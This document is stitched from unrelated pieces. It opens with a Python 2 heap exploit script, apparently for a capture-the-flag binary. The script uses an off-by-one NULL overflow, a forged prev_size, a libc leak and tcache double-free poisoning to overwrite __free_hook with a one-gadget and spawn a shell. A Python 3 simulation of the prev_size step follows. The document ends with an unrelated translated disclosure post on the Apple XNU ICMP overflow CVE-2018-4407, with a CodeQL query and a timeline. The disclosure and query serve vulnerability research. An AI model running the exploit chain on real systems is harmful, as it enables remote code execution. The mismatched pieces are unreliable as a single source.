tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev_size
# This is tricky because the data is copied into the chunk by strcpy, which
# stops copying at a NULL byte.
# To zero a region we need to free and reallocate the chunk several times,
# each time with a size 1 byte smaller than the previous one.
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c has prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are full
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now the 0x1F8 tcache bin contains the same chunk twice

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)
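The prev_size clearing loop in the exploit can be checked offline. The sketch below replays it on a byte array that stands for chunk b plus the first byte of the size field of c. It assumes that the task copies the data with strcpy and fills the chunk with 0xDA before free, as the decompiled code suggests; the helper names are reused from the exploit only for readability and this is Python 3, unlike the exploit itself.

```python
B_USABLE = 0xF8   # usable bytes of chunk b

# mem[0:0xf8] is the user data of b; mem[0xf0:0xf8] doubles as the prev_size
# field of c, and mem[0xf8] is the low byte of c's size field (0x101).
mem = bytearray(b"\xda" * B_USABLE + b"\x01")


def new_heap(data):
    """strcpy(ptr, data): copy up to the first NULL, then append a NULL."""
    payload = data.split(b"\x00", 1)[0]
    mem[0:len(payload)] = payload
    mem[len(payload)] = 0


def delete_heap(size):
    """memset(ptr, 0xDA, size), as the task does right before free()."""
    mem[0:size] = b"\xda" * size


size = 0xF8
new_heap(b"b" * size)                 # the NULL lands on c's size field
for i in range(0xF8, 0xF3, -1):
    delete_heap(size)
    size = i - 1
    new_heap(b"b" * size)             # the NULL lands one byte lower each round
delete_heap(size)
new_heap(b"b" * 0xF0 + b"\x10\x02")   # the two low bytes of prev_size

prev_size = int.from_bytes(mem[0xF0:0xF8], "little")
print(hex(prev_size), hex(mem[0xF8]))
```

In this model the final prev_size reads 0x210 and the low byte of the size field of c is 0, which is the state the exploit needs before it frees c.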

Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device — the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbuf. mbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into m. m is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
else
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314, mtod is used to get m's data pointer:

icp = mtod(m, struct icmp *);

mtod is just a macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

/**
 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
 */

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"
  }

  override predicate isSink(DataFlow::Node sink) {
    exists (FunctionCall call
    | call.getArgument(2) = sink.asExpr() and
      call.getTarget().getName().matches("%copydata"))
  }
}

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size argument of a «copydata» function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do not consider them to be bad query results.

Try QL on XNU

Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus’s instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.4, 10.13.5, 10.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.

Timeline

  • 2018-08-09: Privately disclosed to product-security@apple.com. Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by product-security@apple.com.
  • 2018-08-20: product-security@apple.com asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to product-security@apple.com. Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: product-security@apple.com confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"

Credits

  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from wikipedia.
  • «Send it back». By Edward Backhouse.